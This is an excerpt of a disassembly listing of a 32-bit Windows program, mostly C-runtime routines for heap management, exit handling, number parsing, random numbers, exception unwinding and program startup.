cmp [esp+arg_4], eax
jz short locret_402903
push [esp+arg_0]
call sub_40301F
test eax, eax
pop ecx
jnz short loc_4028DF
loc_402901: ; CODE XREF: sub_4028D8+5�j
xor eax, eax
locret_402903: ; CODE XREF: sub_4028D8+13�j
; sub_4028D8+19�j
retn
sub_4028D8 endp
; =============== S U B R O U T I N E =======================================
sub_402904 proc near ; CODE XREF: sub_4028D8+B�p
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
cmp esi, dword_4090FC
ja short loc_40291C
push esi
call sub_40340A
test eax, eax
pop ecx
jnz short loc_402938
loc_40291C: ; CODE XREF: sub_402904+B�j
test esi, esi
jnz short loc_402923
push 1
pop esi
loc_402923: ; CODE XREF: sub_402904+1A�j
add esi, 0Fh
and esi, 0FFFFFFF0h
push esi
push 0
push dword_51861C
call dword_40806C
loc_402938: ; CODE XREF: sub_402904+16�j
pop esi
retn
sub_402904 endp
; =============== S U B R O U T I N E =======================================
sub_40293A proc near ; CODE XREF: .data:00402F73�p
mov eax, dword_518634
test eax, eax
jz short loc_402945
call eax
loc_402945: ; CODE XREF: sub_40293A+7�j
push offset dword_409014
push offset dword_409008
call sub_402A22
push offset dword_409004
push offset dword_409000
call sub_402A22
add esp, 10h
retn
sub_40293A endp
; =============== S U B R O U T I N E =======================================
sub_402967 proc near ; CODE XREF: sub_401790+55�p
; .data:00402FB2�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_402989
add esp, 0Ch
retn
sub_402967 endp
; =============== S U B R O U T I N E =======================================
sub_402978 proc near ; CODE XREF: .data:00402FD1�p
; sub_402FD6+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_402989
add esp, 0Ch
retn
sub_402978 endp
; =============== S U B R O U T I N E =======================================
sub_402989 proc near ; CODE XREF: sub_402967+8�p
; sub_402978+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_409AC8, edi
jnz short loc_4029A6
push [esp+4+arg_0]
call dword_408078
push eax
call dword_408074
loc_4029A6: ; CODE XREF: sub_402989+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_409AC4, edi
mov byte_409AC0, bl
jnz short loc_4029FA
mov eax, dword_518630
test eax, eax
jz short loc_4029E9
mov ecx, dword_51862C
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_4029E8
loc_4029D5: ; CODE XREF: sub_402989+5D�j
mov eax, [esi]
test eax, eax
jz short loc_4029DD
call eax
loc_4029DD: ; CODE XREF: sub_402989+50�j
sub esi, 4
cmp esi, dword_518630
jnb short loc_4029D5
loc_4029E8: ; CODE XREF: sub_402989+4A�j
pop esi
loc_4029E9: ; CODE XREF: sub_402989+3C�j
push offset dword_409020
push offset dword_409018
call sub_402A22
pop ecx
pop ecx
loc_4029FA: ; CODE XREF: sub_402989+33�j
push offset dword_409028
push offset dword_409024
call sub_402A22
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402A20
push [esp+4+arg_0]
mov dword_409AC8, edi
call dword_408070
loc_402A20: ; CODE XREF: sub_402989+85�j
pop edi
retn
sub_402989 endp
; =============== S U B R O U T I N E =======================================
sub_402A22 proc near ; CODE XREF: sub_40293A+15�p
; sub_40293A+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402A27: ; CODE XREF: sub_402A22+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402A3A
mov eax, [esi]
test eax, eax
jz short loc_402A35
call eax
loc_402A35: ; CODE XREF: sub_402A22+F�j
add esi, 4
jmp short loc_402A27
; ---------------------------------------------------------------------------
loc_402A3A: ; CODE XREF: sub_402A22+9�j
pop esi
retn
sub_402A22 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402A3C proc near ; CODE XREF: sub_4017F0+1E8�p
; sub_4017F0+3B0�p ...
var_CC = byte ptr -0CCh
var_32 = word ptr -32h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1A = word ptr -1Ah
var_18 = word ptr -18h
var_16 = word ptr -16h
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0CCh
lea eax, [ebp+var_10]
push eax
call dword_408084
lea eax, [ebp+var_20]
push eax
call dword_408080
mov ax, [ebp+var_16]
cmp ax, word_409AE2
jnz short loc_402AA1
mov ax, [ebp+var_18]
cmp ax, word_409AE0
jnz short loc_402AA1
mov ax, [ebp+var_1A]
cmp ax, word_409ADE
jnz short loc_402AA1
mov ax, [ebp+var_1E]
cmp ax, word_409ADA
jnz short loc_402AA1
mov ax, [ebp+var_20]
cmp ax, word_409AD8
jnz short loc_402AA1
mov eax, dword_409AD0
jmp short loc_402AE6
; ---------------------------------------------------------------------------
loc_402AA1: ; CODE XREF: sub_402A3C+28�j
; sub_402A3C+35�j ...
lea eax, [ebp+var_CC]
push eax
call dword_40807C
cmp eax, 0FFFFFFFFh
jz short loc_402ACE
cmp eax, 2
jnz short loc_402ACA
cmp [ebp+var_32], 0
jz short loc_402ACA
cmp [ebp+var_24], 0
jz short loc_402ACA
push 1
pop eax
jmp short loc_402AD1
; ---------------------------------------------------------------------------
loc_402ACA: ; CODE XREF: sub_402A3C+7A�j
; sub_402A3C+81�j ...
xor eax, eax
jmp short loc_402AD1
; ---------------------------------------------------------------------------
loc_402ACE: ; CODE XREF: sub_402A3C+75�j
or eax, 0FFFFFFFFh
loc_402AD1: ; CODE XREF: sub_402A3C+8C�j
; sub_402A3C+90�j
push esi
push edi
lea esi, [ebp+var_20]
mov edi, offset word_409AD8
movsd
movsd
movsd
movsd
pop edi
mov dword_409AD0, eax
pop esi
loc_402AE6: ; CODE XREF: sub_402A3C+63�j
push eax
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
movzx eax, [ebp+var_10]
push eax
call sub_403BB5
mov ecx, [ebp+arg_0]
add esp, 1Ch
test ecx, ecx
jz short locret_402B16
mov [ecx], eax
locret_402B16: ; CODE XREF: sub_402A3C+D6�j
leave
retn
sub_402A3C endp
; =============== S U B R O U T I N E =======================================
sub_402B18 proc near ; CODE XREF: sub_4012A0+8C�p
; sub_4012A0+12B�p ...
arg_0 = dword ptr 4
push esi
mov esi, [esp+4+arg_0]
test esi, esi
jz short loc_402B45
push esi
call sub_4030B4
pop ecx
test eax, eax
push esi
jz short loc_402B37
push eax
call sub_4030DF
pop ecx
pop ecx
pop esi
retn
; ---------------------------------------------------------------------------
loc_402B37: ; CODE XREF: sub_402B18+13�j
push 0
push dword_51861C
call dword_408088
loc_402B45: ; CODE XREF: sub_402B18+7�j
pop esi
retn
sub_402B18 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B47 proc near ; CODE XREF: sub_4013E0+61�p
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
push [ebp+arg_C]
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
push [ebp+arg_8]
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
mov [ebp+var_14], 42h
push eax
call sub_403D8C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_402B85
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_402B92
; ---------------------------------------------------------------------------
loc_402B85: ; CODE XREF: sub_402B47+34�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_403C77
pop ecx
pop ecx
loc_402B92: ; CODE XREF: sub_402B47+3C�j
mov eax, esi
pop esi
leave
retn
sub_402B47 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402B97 proc near ; CODE XREF: sub_4016E0+3D�p
; sub_4017F0+B4A�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_403D8C
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_402BD7
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_402BE4
; ---------------------------------------------------------------------------
loc_402BD7: ; CODE XREF: sub_402B97+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_403C77
pop ecx
pop ecx
loc_402BE4: ; CODE XREF: sub_402B97+3E�j
mov eax, esi
pop esi
leave
retn
sub_402B97 endp
; =============== S U B R O U T I N E =======================================
sub_402BE9 proc near ; CODE XREF: sub_4017F0+65A�p
; sub_4017F0+972�p ...
arg_0 = dword ptr 4
push ebx
push ebp
push esi
push edi
mov edi, [esp+10h+arg_0]
loc_402BF1: ; CODE XREF: sub_402BE9+34�j
cmp dword_409314, 1
jle short loc_402C09
movzx eax, byte ptr [edi]
push 8
push eax
call sub_404596
pop ecx
pop ecx
jmp short loc_402C18
; ---------------------------------------------------------------------------
loc_402C09: ; CODE XREF: sub_402BE9+F�j
movzx eax, byte ptr [edi]
mov ecx, off_409108
mov al, [ecx+eax*2]
and eax, 8
loc_402C18: ; CODE XREF: sub_402BE9+1E�j
test eax, eax
jz short loc_402C1F
inc edi
jmp short loc_402BF1
; ---------------------------------------------------------------------------
loc_402C1F: ; CODE XREF: sub_402BE9+31�j
movzx esi, byte ptr [edi]
inc edi
cmp esi, 2Dh
mov ebp, esi
jz short loc_402C2F
cmp esi, 2Bh
jnz short loc_402C33
loc_402C2F: ; CODE XREF: sub_402BE9+3F�j
movzx esi, byte ptr [edi]
inc edi
loc_402C33: ; CODE XREF: sub_402BE9+44�j
xor ebx, ebx
loc_402C35: ; CODE XREF: sub_402BE9+7B�j
cmp dword_409314, 1
jle short loc_402C4A
push 4
push esi
call sub_404596
pop ecx
pop ecx
jmp short loc_402C55
; ---------------------------------------------------------------------------
loc_402C4A: ; CODE XREF: sub_402BE9+53�j
mov eax, off_409108
mov al, [eax+esi*2]
and eax, 4
loc_402C55: ; CODE XREF: sub_402BE9+5F�j
test eax, eax
jz short loc_402C66
lea eax, [ebx+ebx*4]
lea ebx, [esi+eax*2-30h]
movzx esi, byte ptr [edi]
inc edi
jmp short loc_402C35
; ---------------------------------------------------------------------------
loc_402C66: ; CODE XREF: sub_402BE9+6E�j
cmp ebp, 2Dh
mov eax, ebx
jnz short loc_402C6F
neg eax
loc_402C6F: ; CODE XREF: sub_402BE9+82�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_402BE9 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C80 proc near ; CODE XREF: sub_4017F0+5B1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_402CB1
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_402CAF
jz short loc_402CB1
dec ecx
dec ecx
loc_402CAF: ; CODE XREF: sub_402C80+29�j
not ecx
loc_402CB1: ; CODE XREF: sub_402C80+9�j
; sub_402C80+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_402C80 endp
; =============== S U B R O U T I N E =======================================
sub_402CB8 proc near ; CODE XREF: sub_4017F0+1FC�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_4090D0, eax
retn
sub_402CB8 endp
; =============== S U B R O U T I N E =======================================
sub_402CC2 proc near ; CODE XREF: sub_4017F0:loc_401A14�p
mov eax, dword_4090D0
imul eax, 343FDh
add eax, 269EC3h
mov dword_4090D0, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_402CC2 endp
; =============== S U B R O U T I N E =======================================
sub_402CE0 proc near ; CODE XREF: sub_4017F0+25�p
; sub_405D65+DF�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_402D00
loc_402CEC: ; CODE XREF: sub_402CE0+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_402CEC
loc_402D00: ; CODE XREF: sub_402CE0+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_402CE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402D10 proc near ; CODE XREF: sub_402E08+5A�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ebx
push esi
push edi
push ebp
push 0
push 0
push offset loc_402D28
push [ebp+arg_0]
call sub_4078C0
loc_402D28: ; DATA XREF: sub_402D10+B�o
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_402D10 endp
; =============== S U B R O U T I N E =======================================
sub_402D30 proc near ; DATA XREF: sub_402D52+A�o
; .data:00402DC3�o
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_C = dword ptr 10h
mov ecx, [esp+arg_0]
test dword ptr [ecx+4], 6
mov eax, 1
jz short locret_402D51
mov eax, [esp+arg_4]
mov edx, [esp+arg_C]
mov [edx], eax
mov eax, 3
locret_402D51: ; CODE XREF: sub_402D30+10�j
retn
sub_402D30 endp
; =============== S U B R O U T I N E =======================================
sub_402D52 proc near ; CODE XREF: sub_402E08+67�p
; sub_402E08+A7�p ...
var_14 = dword ptr -14h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
mov eax, [esp+0Ch+arg_0]
push eax
push 0FFFFFFFEh
push offset sub_402D30
push large dword ptr fs:0
mov large fs:0, esp
loc_402D6F: ; CODE XREF: sub_402D52:loc_402DAA�j
mov eax, [esp+1Ch+arg_0]
mov ebx, [eax+8]
mov esi, [eax+0Ch]
cmp esi, 0FFFFFFFFh
jz short loc_402DAC
cmp esi, [esp+1Ch+arg_4]
jz short loc_402DAC
lea esi, [esi+esi*2]
mov ecx, [ebx+esi*4]
mov [esp+1Ch+var_14], ecx
mov [eax+0Ch], ecx
cmp dword ptr [ebx+esi*4+4], 0
jnz short loc_402DAA
push 101h
mov eax, [ebx+esi*4+8]
call sub_402DE6
call dword ptr [ebx+esi*4+8]
loc_402DAA: ; CODE XREF: sub_402D52+44�j
jmp short loc_402D6F
; ---------------------------------------------------------------------------
loc_402DAC: ; CODE XREF: sub_402D52+2A�j
; sub_402D52+30�j
pop large dword ptr fs:0
add esp, 0Ch
pop edi
pop esi
pop ebx
retn
sub_402D52 endp
; ---------------------------------------------------------------------------
xor eax, eax
mov ecx, large fs:0
cmp dword ptr [ecx+4], offset sub_402D30
jnz short locret_402DDC
mov edx, [ecx+0Ch]
mov edx, [edx+0Ch]
cmp [ecx+8], edx
jnz short locret_402DDC
mov eax, 1
locret_402DDC: ; CODE XREF: .data:00402DCA�j
; .data:00402DD5�j
retn
; ---------------------------------------------------------------------------
push ebx
push ecx
mov ebx, offset dword_4090E0
jmp short loc_402DF0
; =============== S U B R O U T I N E =======================================
sub_402DE6 proc near ; CODE XREF: sub_402D52+4F�p
; sub_402E08+78�p
push ebx
push ecx
mov ebx, offset dword_4090E0
mov ecx, [ebp+8]
loc_402DF0: ; CODE XREF: .data:00402DE4�j
mov [ebx+8], ecx
mov [ebx+4], eax
mov [ebx+0Ch], ebp
pop ecx
pop ebx
retn 4
sub_402DE6 endp
; ---------------------------------------------------------------------------
align 10h
push esi
inc ebx
xor dh, [eax]
pop eax
inc ebx
xor [eax], dh
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402E08 proc near ; DATA XREF: sub_4017F0+A�o
; .data:00402EEA�o ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
push ebx
push esi
push edi
push ebp
cld
mov ebx, [ebp+arg_4]
mov eax, [ebp+arg_0]
test dword ptr [eax+4], 6
jnz loc_402EA8
mov [ebp+var_8], eax
mov eax, [ebp+arg_8]
mov [ebp+var_4], eax
lea eax, [ebp+var_8]
mov [ebx-4], eax
mov esi, [ebx+0Ch]
mov edi, [ebx+8]
loc_402E3B: ; CODE XREF: sub_402E08+90�j
cmp esi, 0FFFFFFFFh
jz short loc_402EA1
lea ecx, [esi+esi*2]
cmp dword ptr [edi+ecx*4+4], 0
jz short loc_402E8F
push esi
push ebp
lea ebp, [ebx+10h]
call dword ptr [edi+ecx*4+4]
pop ebp
pop esi
mov ebx, [ebp+arg_4]
or eax, eax
jz short loc_402E8F
js short loc_402E9A
mov edi, [ebx+8]
push ebx
call sub_402D10
add esp, 4
lea ebp, [ebx+10h]
push esi
push ebx
call sub_402D52
add esp, 8
lea ecx, [esi+esi*2]
push 1
mov eax, [edi+ecx*4+8]
call sub_402DE6
mov eax, [edi+ecx*4]
mov [ebx+0Ch], eax
call dword ptr [edi+ecx*4+8]
loc_402E8F: ; CODE XREF: sub_402E08+40�j
; sub_402E08+52�j
mov edi, [ebx+8]
lea ecx, [esi+esi*2]
mov esi, [edi+ecx*4]
jmp short loc_402E3B
; ---------------------------------------------------------------------------
loc_402E9A: ; CODE XREF: sub_402E08+54�j
mov eax, 0
jmp short loc_402EBD
; ---------------------------------------------------------------------------
loc_402EA1: ; CODE XREF: sub_402E08+36�j
mov eax, 1
jmp short loc_402EBD
; ---------------------------------------------------------------------------
loc_402EA8: ; CODE XREF: sub_402E08+18�j
push ebp
lea ebp, [ebx+10h]
push 0FFFFFFFFh
push ebx
call sub_402D52
add esp, 8
pop ebp
mov eax, 1
loc_402EBD: ; CODE XREF: sub_402E08+97�j
; sub_402E08+9E�j
pop ebp
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
sub_402E08 endp
; ---------------------------------------------------------------------------
push ebp
mov ecx, [esp+8]
mov ebp, [ecx]
mov eax, [ecx+1Ch]
push eax
mov eax, [ecx+18h]
push eax
call sub_402D52
add esp, 8
pop ebp
retn 4
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_408138
push offset sub_402E08
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_40809C
xor edx, edx
mov dl, ah
mov dword_409A98, edx
mov ecx, eax
and ecx, 0FFh
mov dword_409A94, ecx
shl ecx, 8
add ecx, edx
mov dword_409A90, ecx
shr eax, 10h
mov dword_409A8C, eax
xor esi, esi
push esi
call sub_40303A
pop ecx
test eax, eax
jnz short loc_402F4C
push 1Ch
call sub_402FFB
pop ecx
loc_402F4C: ; CODE XREF: .data:00402F42�j
mov [ebp-4], esi
call sub_404C58
call dword_408098
mov dword_518620, eax
call sub_404B26
mov dword_409AE8, eax
call sub_4048D9
call sub_404820
call sub_40293A
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_408094
call sub_4047C8
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_402F99
movzx eax, word ptr [ebp-2Ch]
jmp short loc_402F9C
; ---------------------------------------------------------------------------
loc_402F99: ; CODE XREF: .data:00402F91�j
push 0Ah
pop eax
loc_402F9C: ; CODE XREF: .data:00402F97�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_408068
push eax
call sub_4017F0
; ---------------------------------------------------------------------------
mov [ebp-60h], eax
push eax
call sub_402967
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_404644
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402978
; =============== S U B R O U T I N E =======================================
sub_402FD6 proc near ; CODE XREF: sub_404820+4E�p
; sub_404820+7D�p ...
arg_0 = dword ptr 4
cmp dword_409AF0, 1
jnz short loc_402FE4
call sub_404E03
loc_402FE4: ; CODE XREF: sub_402FD6+7�j
push [esp+arg_0]
call sub_404E3C
push 0FFh
call off_4090F0
pop ecx
pop ecx
retn
sub_402FD6 endp
; =============== S U B R O U T I N E =======================================
sub_402FFB proc near ; CODE XREF: .data:00402F46�p
arg_0 = dword ptr 4
cmp dword_409AF0, 1
jnz short loc_403009
call sub_404E03
loc_403009: ; CODE XREF: sub_402FFB+7�j
push [esp+arg_0]
call sub_404E3C
pop ecx
push 0FFh
call dword_408070
retn
sub_402FFB endp
; =============== S U B R O U T I N E =======================================
sub_40301F proc near ; CODE XREF: sub_4028D8+1F�p
; sub_406A9F+5B�p ...
arg_0 = dword ptr 4
mov eax, dword_409AF8
test eax, eax
jz short loc_403037
push [esp+arg_0]
call eax
test eax, eax
pop ecx
jz short loc_403037
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_403037: ; CODE XREF: sub_40301F+7�j
; sub_40301F+12�j
xor eax, eax
retn
sub_40301F endp
; =============== S U B R O U T I N E =======================================
sub_40303A proc near ; CODE XREF: .data:00402F3A�p
arg_0 = dword ptr 4
xor eax, eax
push 0
cmp [esp+4+arg_0], eax
push 1000h
setz al
push eax
call dword_4080A4
test eax, eax
mov dword_51861C, eax
jz short loc_40306F
call sub_403076
test eax, eax
jnz short loc_403072
push dword_51861C
call dword_4080A0
loc_40306F: ; CODE XREF: sub_40303A+1E�j
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_403072: ; CODE XREF: sub_40303A+27�j
push 1
pop eax
retn
sub_40303A endp
; =============== S U B R O U T I N E =======================================
sub_403076 proc near ; CODE XREF: sub_40303A+20�p
push 140h
push 0
push dword_51861C
call dword_40806C
test eax, eax
mov dword_518618, eax
jnz short loc_403093
retn
; ---------------------------------------------------------------------------
loc_403093: ; CODE XREF: sub_403076+1A�j
and dword_518610, 0
and dword_518614, 0
push 1
mov dword_51860C, eax
mov dword_518604, 10h
pop eax
retn
sub_403076 endp
; =============== S U B R O U T I N E =======================================
sub_4030B4 proc near ; CODE XREF: sub_402B18+A�p
; sub_407632+3D�p
arg_0 = dword ptr 4
mov eax, dword_518614
lea ecx, [eax+eax*4]
mov eax, dword_518618
lea ecx, [eax+ecx*4]
loc_4030C4: ; CODE XREF: sub_4030B4+26�j
cmp eax, ecx
jnb short loc_4030DC
mov edx, [esp+arg_0]
sub edx, [eax+0Ch]
cmp edx, 100000h
jb short locret_4030DE
add eax, 14h
jmp short loc_4030C4
; ---------------------------------------------------------------------------
loc_4030DC: ; CODE XREF: sub_4030B4+12�j
xor eax, eax
locret_4030DE: ; CODE XREF: sub_4030B4+21�j
retn
sub_4030B4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4030DF proc near ; CODE XREF: sub_402B18+16�p
; sub_407632+89�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 14h
mov edx, [ebp+arg_4]
mov ecx, [ebp+arg_0]
push ebx
push esi
mov eax, [ecx+10h]
mov esi, edx
sub esi, [ecx+0Ch]
mov ebx, [edx-4]
add edx, 0FFFFFFFCh
push edi
shr esi, 0Fh
mov ecx, esi
mov edi, [edx-4]
imul ecx, 204h
dec ebx
mov [ebp+var_4], edi
lea ecx, [ecx+eax+144h]
mov [ebp+var_C], ebx
mov [ebp+var_10], ecx
mov ecx, [ebx+edx]
test cl, 1
mov [ebp+var_8], ecx
jnz short loc_4031A5
sar ecx, 4
push 3Fh
dec ecx
pop edi
mov [ebp+arg_4], ecx
cmp ecx, edi
jbe short loc_403137
mov [ebp+arg_4], edi
loc_403137: ; CODE XREF: sub_4030DF+53�j
mov ecx, [ebx+edx+4]
cmp ecx, [ebx+edx+8]
jnz short loc_403189
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403165
mov edi, 80000000h
shr edi, cl
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+44h], edi
dec byte ptr [ecx]
jnz short loc_403189
mov ecx, [ebp+arg_0]
and [ecx], edi
jmp short loc_403189
; ---------------------------------------------------------------------------
loc_403165: ; CODE XREF: sub_4030DF+68�j
add ecx, 0FFFFFFE0h
mov edi, 80000000h
shr edi, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edi
and [eax+esi*4+0C4h], edi
dec byte ptr [ecx]
jnz short loc_403189
mov ecx, [ebp+arg_0]
and [ecx+4], edi
loc_403189: ; CODE XREF: sub_4030DF+60�j
; sub_4030DF+7D�j ...
mov ecx, [ebx+edx+8]
mov edi, [ebx+edx+4]
mov [ecx+4], edi
mov ecx, [ebx+edx+4]
mov edi, [ebx+edx+8]
add ebx, [ebp+var_8]
mov [ecx+8], edi
mov [ebp+var_C], ebx
loc_4031A5: ; CODE XREF: sub_4030DF+45�j
mov edi, ebx
sar edi, 4
dec edi
cmp edi, 3Fh
jbe short loc_4031B3
push 3Fh
pop edi
loc_4031B3: ; CODE XREF: sub_4030DF+CF�j
mov ecx, [ebp+var_4]
and ecx, 1
mov [ebp+var_14], ecx
jnz loc_403262
sub edx, [ebp+var_4]
mov ecx, [ebp+var_4]
sar ecx, 4
push 3Fh
mov [ebp+var_8], edx
dec ecx
pop edx
cmp ecx, edx
mov [ebp+arg_4], ecx
jbe short loc_4031DE
mov [ebp+arg_4], edx
mov ecx, edx
loc_4031DE: ; CODE XREF: sub_4030DF+F8�j
add ebx, [ebp+var_4]
mov edi, ebx
mov [ebp+var_C], ebx
sar edi, 4
dec edi
cmp edi, edx
jbe short loc_4031F0
mov edi, edx
loc_4031F0: ; CODE XREF: sub_4030DF+10D�j
cmp ecx, edi
jz short loc_40325F
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
cmp edx, [ecx+8]
jnz short loc_403247
mov ecx, [ebp+arg_4]
cmp ecx, 20h
jnb short loc_403223
mov edx, 80000000h
shr edx, cl
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+44h], edx
dec byte ptr [ecx]
jnz short loc_403247
mov ecx, [ebp+arg_0]
and [ecx], edx
jmp short loc_403247
; ---------------------------------------------------------------------------
loc_403223: ; CODE XREF: sub_4030DF+126�j
add ecx, 0FFFFFFE0h
mov edx, 80000000h
shr edx, cl
mov ecx, [ebp+arg_4]
lea ecx, [ecx+eax+4]
not edx
and [eax+esi*4+0C4h], edx
dec byte ptr [ecx]
jnz short loc_403247
mov ecx, [ebp+arg_0]
and [ecx+4], edx
loc_403247: ; CODE XREF: sub_4030DF+11E�j
; sub_4030DF+13B�j ...
mov ecx, [ebp+var_8]
mov edx, [ecx+8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_8]
mov edx, [ecx+4]
mov ecx, [ecx+8]
mov [edx+8], ecx
loc_40325F: ; CODE XREF: sub_4030DF+113�j
mov edx, [ebp+var_8]
loc_403262: ; CODE XREF: sub_4030DF+DD�j
cmp [ebp+var_14], 0
jnz short loc_403271
cmp [ebp+arg_4], edi
jz loc_4032FA
loc_403271: ; CODE XREF: sub_4030DF+187�j
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov ecx, [ecx+4]
mov [edx+4], ecx
mov ecx, [ebp+var_10]
lea ecx, [ecx+edi*8]
mov [edx+8], ecx
mov [ecx+4], edx
mov ecx, [edx+4]
mov [ecx+8], edx
mov ecx, [edx+4]
cmp ecx, [edx+8]
jnz short loc_4032FA
mov cl, [edi+eax+4]
cmp edi, 20h
mov byte ptr [ebp+arg_4+3], cl
inc cl
mov [edi+eax+4], cl
jnb short loc_4032CE
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4032BD
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx], ebx
loc_4032BD: ; CODE XREF: sub_4030DF+1CE�j
mov ebx, 80000000h
mov ecx, edi
shr ebx, cl
lea eax, [eax+esi*4+44h]
or [eax], ebx
jmp short loc_4032F7
; ---------------------------------------------------------------------------
loc_4032CE: ; CODE XREF: sub_4030DF+1C8�j
cmp byte ptr [ebp+arg_4+3], 0
jnz short loc_4032E4
lea ecx, [edi-20h]
mov ebx, 80000000h
shr ebx, cl
mov ecx, [ebp+arg_0]
or [ecx+4], ebx
loc_4032E4: ; CODE XREF: sub_4030DF+1F3�j
lea ecx, [edi-20h]
mov edi, 80000000h
shr edi, cl
lea eax, [eax+esi*4+0C4h]
or [eax], edi
loc_4032F7: ; CODE XREF: sub_4030DF+1ED�j
mov ebx, [ebp+var_C]
loc_4032FA: ; CODE XREF: sub_4030DF+18C�j
